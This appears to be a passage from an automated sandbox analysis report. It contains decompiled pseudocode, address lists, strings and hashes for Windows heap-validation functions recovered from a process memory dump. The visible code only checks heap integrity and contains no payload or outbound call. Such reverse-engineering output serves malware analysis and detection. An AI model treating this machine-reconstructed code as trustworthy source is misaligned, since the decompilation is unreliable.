									_t63 = _t415 + 8; // -16
									E00F1BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E00FA23E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00EF1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x00fb4af7
0x00fb4afb
0x00fb4afd
0x00fb4b01
0x00fb4b03
0x00fb4b08
0x00fb4b0a
0x00fb4b0f
0x00fb4eb5
0x00fb4eb5
0x00fb4ebb
0x00fb50d5
0x00fb50d8
0x00fb4ff6
0x00000000
0x00fb4ff6
0x00fb50de
0x00fb50e4
0x00fb50e8
0x00fb5107
0x00fb510c
0x00fb50ea
0x00fb50ff
0x00fb5104
0x00fb5112
0x00fb5115
0x00fb5118
0x00fb5119
0x00fb50cb
0x00fb50cb
0x00fb50af
0x00000000
0x00fb50af
0x00fb4ecb
0x00fb50b6
0x00fb50bb
0x00fb4ed1
0x00fb4ee6
0x00fb4eeb
0x00fb50c1
0x00fb50c2
0x00fb50c5
0x00fb50c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb4b15
0x00fb4b15
0x00fb4b1c
0x00fb4b1e
0x00fb4b23
0x00fb4b27
0x00fb4b33
0x00fb4b38
0x00fb4b3a
0x00fb4b3c
0x00fb4b41
0x00fb4b41
0x00fb4b3a
0x00fb4b52
0x00fb5045
0x00fb504b
0x00fb504f
0x00fb506e
0x00fb5073
0x00fb5051
0x00fb5066
0x00fb506b
0x00fb5083
0x00fb5088
0x00fb5088
0x00fb508a
0x00fb5091
0x00fb5099
0x00fb5099
0x00fb509d
0x00fb50a7
0x00fb50ad
0x00fb50ad
0x00fb50ad
0x00000000
0x00fb509d
0x00fb4b58
0x00fb4b5b
0x00fb4b5e
0x00fb4b63
0x00fb4b66
0x00fb4b69
0x00fb4b6f
0x00fb4be4
0x00fb4bf0
0x00fb4bf2
0x00fb4bf5
0x00fb4dc3
0x00fb4dc6
0x00fb4dc9
0x00fb4dce
0x00fb4dce
0x00fb4dd0
0x00fb4dd0
0x00fb4dd5
0x00fb4def
0x00fb4dd7
0x00fb4de7
0x00fb4de7
0x00fb4df3
0x00fb5001
0x00fb5007
0x00fb500b
0x00fb502a
0x00fb502f
0x00fb500d
0x00fb5022
0x00fb5027
0x00fb5039
0x00fb503a
0x00fb503b
0x00000000
0x00fb4df9
0x00fb4dfd
0x00fb4e90
0x00fb4e94
0x00fb4e9e
0x00fb4ea4
0x00fb4ea4
0x00fb4ea4
0x00fb4ea6
0x00fb4ea6
0x00000000
0x00fb4ea6
0x00fb4e03
0x00fb4e08
0x00fb4f88
0x00fb4f92
0x00fb4f99
0x00fb4f9c
0x00fb4fe0
0x00fb4fe4
0x00fb4fee
0x00fb4ff4
0x00fb4ff4
0x00fb4ff4
0x00000000
0x00fb4fe4
0x00fb4f9e
0x00fb4fa4
0x00fb4fa8
0x00fb4fc7
0x00fb4fcc
0x00fb4faa
0x00fb4fbf
0x00fb4fc4
0x00fb4fd2
0x00fb4fd5
0x00fb4fd6
0x00fb4f34
0x00fb4f34
0x00000000
0x00fb4f39
0x00fb4e0e
0x00fb4e14
0x00fb4e1b
0x00fb4e25
0x00fb4e2b
0x00fb4e2b
0x00fb4e33
0x00fb4e38
0x00fb4e8a
0x00fb4e8a
0x00000000
0x00fb4e3a
0x00fb4e3e
0x00fb4e43
0x00fb4e47
0x00fb4e53
0x00fb4e58
0x00fb4e5a
0x00fb4e5c
0x00fb4e61
0x00fb4e61
0x00fb4e5a
0x00fb4e6e
0x00fb4f41
0x00fb4f47
0x00fb4f4b
0x00fb4f6a
0x00fb4f6f
0x00fb4f4d
0x00fb4f62
0x00fb4f67
0x00fb4f7f
0x00fb4f80
0x00fb4f81
0x00000000
0x00fb4e74
0x00fb4e78
0x00fb4e82
0x00fb4e88
0x00fb4e88
0x00000000
0x00fb4e78
0x00fb4e6e
0x00fb4e38
0x00fb4df3
0x00fb4bfe
0x00fb4c01
0x00fb4c04
0x00fb4c07
0x00fb4c09
0x00fb4c0c
0x00fb4c0e
0x00fb4c0e
0x00fb4c11
0x00fb4c11
0x00fb4c0c
0x00fb4c14
0x00fb4c17
0x00fb4dae
0x00fb4db2
0x00fb4db7
0x00fb4dba
0x00fb4dbd
0x00fb4ef1
0x00fb4ef7
0x00fb4efb
0x00fb4f1a
0x00fb4f1f
0x00fb4efd
0x00fb4f12
0x00fb4f17
0x00fb4f2b
0x00fb4f2b
0x00fb4f2d
0x00fb4f2e
0x00fb4f2f
0x00000000
0x00fb4f2f
0x00000000
0x00fb4c1d
0x00fb4c1d
0x00fb4c20
0x00fb4c23
0x00fb4c26
0x00fb4c29
0x00fb4c2c
0x00fb4c2e
0x00fb4d91
0x00fb4d91
0x00fb4d92
0x00fb4d97
0x00fb4d9e
0x00000000
0x00fb4d9e
0x00fb4c34
0x00fb4c37
0x00fb4c39
0x00fb4c3c
0x00000000
0x00000000
0x00fb4c45
0x00fb4c48
0x00fb4c4e
0x00fb4c50
0x00fb4c78
0x00fb4c78
0x00fb4c7b
0x00fb4c7d
0x00fb4c80
0x00fb4c84
0x00fb4cad
0x00fb4cad
0x00fb4cb0
0x00fb4cb8
0x00fb4cbb
0x00fb4cbe
0x00fb4cc1
0x00fb4cc7
0x00fb4cdc
0x00fb4cc9
0x00fb4cd2
0x00fb4cd4
0x00fb4cd4
0x00fb4cde
0x00fb4ce0
0x00fb4d13
0x00fb4d13
0x00fb4d16
0x00fb4d18
0x00fb4d29
0x00fb4d2a
0x00fb4d2c
0x00fb4d34
0x00fb4d1a
0x00fb4d1a
0x00fb4d1a
0x00fb4d1d
0x00fb4d1f
0x00fb4d22
0x00fb4d24
0x00fb4d24
0x00fb4d3c
0x00fb4d3f
0x00fb4d45
0x00fb4d47
0x00fb4d6c
0x00fb4d6c
0x00fb4d70
0x00fb4d7e
0x00fb4d84
0x00fb4d84
0x00000000
0x00fb4d49
0x00fb4d49
0x00fb4d56
0x00fb4d56
0x00fb4d59
0x00000000
0x00000000
0x00fb4d4e
0x00fb4d50
0x00fb4d52
0x00fb4d8e
0x00fb4d5d
0x00fb4d5f
0x00fb4d67
0x00000000
0x00fb4d67
0x00fb4d54
0x00fb4d54
0x00fb4d5b
0x00000000
0x00fb4d5b
0x00fb4ce2
0x00fb4ce2
0x00fb4ce5
0x00fb4ce5
0x00fb4ce7
0x00fb4cfb
0x00fb4ce9
0x00fb4ce9
0x00fb4cec
0x00fb4cef
0x00fb4cf1
0x00fb4cf3
0x00fb4cf3
0x00fb4cf3
0x00fb4cf6
0x00fb4cf6
0x00fb4d02
0x00fb4d05
0x00000000
0x00000000
0x00fb4d07
0x00fb4d0f
0x00fb4d11
0x00000000
0x00000000
0x00000000
0x00fb4d11
0x00000000
0x00fb4ce5
0x00fb4ce0
0x00fb4c8a
0x00fb4c8f
0x00fb4c91
0x00000000
0x00000000
0x00fb4c9d
0x00000000
0x00fb4c9d
0x00fb4c52
0x00fb4c5f
0x00fb4c5f
0x00fb4c62
0x00000000
0x00000000
0x00fb4c57
0x00fb4c59
0x00fb4c5b
0x00fb4caa
0x00fb4c66
0x00fb4c68
0x00fb4c70
0x00fb4c75
0x00000000
0x00fb4c75
0x00fb4c5d
0x00fb4c5d
0x00fb4c64
0x00000000
0x00fb4c64
0x00fb4c17
0x00fb4b75
0x00fb4bc4
0x00fb4bc8
0x00000000
0x00000000
0x00fb4bd9
0x00000000
0x00000000
0x00000000
0x00fb4b77
0x00fb4b7a
0x00fb4b8c
0x00fb4b7c
0x00fb4b7e
0x00fb4b83
0x00fb4b86
0x00fb4b86
0x00fb4b90
0x00fb4b93
0x00000000
0x00000000
0x00fb4b95
0x00fb4bab
0x00fb4bb0
0x00000000
0x00000000
0x00fb4bb2
0x00fb4bb9
0x00000000
0x00000000
0x00fb4bbb
0x00fb4bbe
0x00fb4bc1
0x00fb4bc1
0x00000000
0x00fb4bc1
0x00fb4b97
0x00fb4ba4
0x00000000
0x00000000
0x00fb4ba6
0x00000000
0x00fb4ba6
0x00fb4ea9
0x00fb4ea9
0x00fb4eb2
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00FB4EE1, 00FB4F0D, 00FB4F5D, 00FB4FBA, 00FB501D, 00FB5061, 00FB50FA
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 00FB508C
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 00FB5119
Heap block at %p has incorrect segment offset (%x), xrefs: 00FB503B
Heap block at %p is not last block in segment (%p), xrefs: 00FB4FD6
HEAP: , xrefs: 00FB4F1A, 00FB4F6A, 00FB4FC7, 00FB502A, 00FB506E, 00FB50B6, 00FB5107
Free Heap block %p modified at %p after it was freed, xrefs: 00FB4F2F
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 00FB50C6
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 00FB4F81

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 6a32e9e5433782a63f4132f553b0eaa4533e601843303025e196dca62fef2f59
Instruction ID: 86f135d3dd3cc8229c688c5adbf54415fbda9330501abfbf8b2243e02baab47d
Opcode Fuzzy Hash: 6a32e9e5433782a63f4132f553b0eaa4533e601843303025e196dca62fef2f59
Instruction Fuzzy Hash: 2E12DE316006469FCB25DF2AC595BB6BBF1FF48710F148459E48A9B682D738F881EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00FB4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E00FB49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0xfe6378 = _t267;
						asm("int3");
						 *0xfe6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E00F2174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00EFB150();
							} else {
								E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00EFB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00EFB150();
							} else {
								E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00EFB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0xfe6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00F39660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E00F2174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00EFB150();
										} else {
											E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00EFB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00EFB150();
									} else {
										E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00EFB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00EFB150();
								} else {
									E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00EFB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00EFB150();
							} else {
								E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E00FB4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E00FAFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00FA23E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x00fb44a1
0x00fb44a3
0x00fb44a7
0x00fb44ac
0x00fb44af
0x00fb44b2
0x00fb44b9
0x00fb44bc
0x00fb47f2
0x00fb47f2
0x00fb47f8
0x00fb47fc
0x00fb47fe
0x00fb4804
0x00fb4805
0x00fb4805
0x00fb480c
0x00fb4810
0x00fb4812
0x00fb4812
0x00fb4812
0x00fb4822
0x00fb4822
0x00fb4827
0x00fb4827
0x00000000
0x00fb4827
0x00fb44c4
0x00fb44d3
0x00fb44d9
0x00fb44dc
0x00fb44de
0x00fb44e0
0x00fb4560
0x00fb4520
0x00fb4522
0x00fb4525
0x00fb4528
0x00fb452b
0x00fb452e
0x00fb4530
0x00fb4697
0x00fb469d
0x00fb46a1
0x00fb46c0
0x00fb46c5
0x00fb46a3
0x00fb46b8
0x00fb46bd
0x00fb46cb
0x00fb46d4
0x00fb4677
0x00fb4677
0x00fb4679
0x00fb467c
0x00fb468a
0x00fb4690
0x00fb4690
0x00fb47f1
0x00fb47f1
0x00fb47f1
0x00000000
0x00fb47f1
0x00fb4536
0x00fb4539
0x00fb453c
0x00fb4636
0x00fb463c
0x00fb4640
0x00fb465f
0x00fb4664
0x00fb4642
0x00fb4657
0x00fb465c
0x00fb4670
0x00000000
0x00fb4542
0x00fb4542
0x00fb4546
0x00fb4548
0x00fb454b
0x00fb4555
0x00fb455b
0x00fb455b
0x00fb455b
0x00fb455d
0x00fb455d
0x00fb455d
0x00000000
0x00fb455d
0x00fb453c
0x00fb4579
0x00fb457c
0x00fb4587
0x00fb4589
0x00fb4591
0x00fb4592
0x00fb4597
0x00fb4598
0x00fb45a1
0x00fb45ab
0x00fb45ab
0x00fb45a1
0x00fb45ae
0x00fb45b4
0x00fb45b9
0x00fb45bd
0x00fb4759
0x00fb4759
0x00fb475f
0x00fb4761
0x00fb4763
0x00fb4765
0x00fb4768
0x00fb476b
0x00fb476d
0x00fb479c
0x00fb479c
0x00fb479f
0x00fb47a2
0x00fb47a4
0x00fb4830
0x00fb4833
0x00fb4879
0x00fb487d
0x00fb48f1
0x00fb48f3
0x00fb48f3
0x00000000
0x00fb48f3
0x00fb487f
0x00fb4885
0x00fb4887
0x00fb48a8
0x00fb48a8
0x00fb48ae
0x00fb48b0
0x00fb48dc
0x00fb48dc
0x00fb48dc
0x00fb48dc
0x00fb48ec
0x00000000
0x00fb48ec
0x00fb48b2
0x00fb48bc
0x00fb48be
0x00fb48c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb48c3
0x00fb48c3
0x00fb48c6
0x00fb48c9
0x00fb48cc
0x00fb48d1
0x00fb48d4
0x00000000
0x00000000
0x00fb48d6
0x00fb48d7
0x00fb48da
0x00000000
0x00000000
0x00000000
0x00fb48da
0x00fb494f
0x00fb4955
0x00fb4959
0x00fb4978
0x00fb497d
0x00fb495b
0x00fb4970
0x00fb4975
0x00fb4986
0x00fb4987
0x00fb498a
0x00fb498d
0x00fb4997
0x00fb47ef
0x00fb47ef
0x00fb47ef
0x00000000
0x00fb47ef
0x00fb4890
0x00fb4890
0x00fb4891
0x00fb4891
0x00fb4894
0x00fb4897
0x00fb489d
0x00fb48a0
0x00000000
0x00000000
0x00fb48a2
0x00fb48a3
0x00fb48a6
0x00000000
0x00000000
0x00000000
0x00fb48a6
0x00fb48fb
0x00fb4901
0x00fb4905
0x00fb4924
0x00fb4929
0x00fb4907
0x00fb491c
0x00fb4921
0x00fb492f
0x00fb4935
0x00fb4936
0x00fb4939
0x00fb4942
0x00000000
0x00fb4947
0x00fb4835
0x00fb483b
0x00fb483f
0x00fb485e
0x00fb4863
0x00fb4841
0x00fb4856
0x00fb485b
0x00fb4869
0x00fb486c
0x00fb486f
0x00fb47e7
0x00fb47e7
0x00000000
0x00fb47ec
0x00fb47aa
0x00fb47b0
0x00fb47b4
0x00fb47d3
0x00fb47d8
0x00fb47b6
0x00fb47cb
0x00fb47d0
0x00fb47de
0x00fb47df
0x00fb47e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb476f
0x00fb476f
0x00fb4778
0x00fb4785
0x00fb4787
0x00fb478c
0x00fb478e
0x00000000
0x00000000
0x00fb4790
0x00fb4792
0x00fb4794
0x00000000
0x00000000
0x00fb4796
0x00fb4799
0x00000000
0x00fb4799
0x00000000
0x00fb45c3
0x00fb45c3
0x00fb45c7
0x00fb45c7
0x00fb45ca
0x00fb45cf
0x00fb45d3
0x00fb45df
0x00fb45e4
0x00fb45e6
0x00fb45e8
0x00fb45ed
0x00fb45ed
0x00fb45f2
0x00fb45f2
0x00fb45f7
0x00fb45fc
0x00fb4602
0x00fb4606
0x00fb4609
0x00fb460f
0x00fb46de
0x00fb46e3
0x00fb46e5
0x00fb46ec
0x00fb46ee
0x00fb46f6
0x00fb46f6
0x00fb46f6
0x00fb46f6
0x00fb46ec
0x00fb4615
0x00fb4615
0x00fb461d
0x00fb462e
0x00fb462e
0x00fb461d
0x00fb460f
0x00fb4609
0x00fb46fd
0x00000000
0x00000000
0x00fb4710
0x00fb471a
0x00fb4720
0x00fb4720
0x00fb4722
0x00fb472c
0x00000000
0x00fb472e
0x00fb472e
0x00000000
0x00fb472e
0x00fb472c
0x00fb4738
0x00fb473c
0x00fb474b
0x00fb4751
0x00fb4751
0x00000000
0x00fb473c
0x00fb48f4
0x00fb48f4
0x00000000
0x00fb48f4

Strings

Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 00FB4992
HEAP[%wZ]: , xrefs: 00FB4652, 00FB46B3, 00FB47C6, 00FB4851, 00FB4917, 00FB496B
dedicated (%04Ix) free list element %p is marked busy, xrefs: 00FB46CF
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 00FB486F
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 00FB493D
HEAP: , xrefs: 00FB465F, 00FB46C0, 00FB47D3, 00FB485E, 00FB4924, 00FB4978
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 00FB47E2
Non-Dedicated free list element %p is out of order, xrefs: 00FB466B

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 9d6bb4731c55317c68ba069ea842884ec65bfa53a8c3c8d74341267512905424
Instruction ID: dd084d515bff537fb6f4c866e4f97cc8e8cc2ab4474be9aab08531885bd16bdb
Opcode Fuzzy Hash: 9d6bb4731c55317c68ba069ea842884ec65bfa53a8c3c8d74341267512905424
Instruction Fuzzy Hash: 40F11131A006499FCB25CF6AC590BFAB7F5FF49314F14812AE086A7282CB34B985DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F1A309, Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00F1A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
